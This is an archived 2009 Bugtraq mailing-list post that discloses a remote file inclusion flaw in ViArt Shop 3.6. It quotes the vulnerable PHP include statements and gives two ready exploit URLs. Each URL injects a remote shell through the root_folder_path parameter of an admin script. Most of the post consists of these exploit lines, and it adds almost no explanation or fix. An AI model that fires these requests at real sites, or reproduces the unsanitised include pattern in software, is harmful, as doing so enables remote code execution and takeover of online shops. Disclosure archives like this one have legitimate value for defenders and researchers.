| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090216171308.28800.qmail@securityfocus.com>
Date: 16 Feb 2009 17:13:08 -0000
From: Dr.linux@....net
To: bugtraq@...urityfocus.com
Subject: RFI Bug
ViArt Shop 3.6 Remote File Include BUG
FreeDownload : http://www.viart.com/tracking_downloads.php?fn=viart_shop-3.6.zip
#FOUND BY : Dr-Linux
#Mail : Dr.linux@....net
include_once($root_folder_path."includes/common.php");
include_once($root_folder_path . "includes/record.php");
Exploi >>> http://www.target/path/admin/admin_forgotten_password.php?root_folder_path=[shell]
include_once($root_folder_path . "messages/" . $language_code . "/download_messages.php");
Exploit >>> http://www.target/path/admin/admin_admin.php?root_folder_path=[shell]
Powered by blists - more mailing lists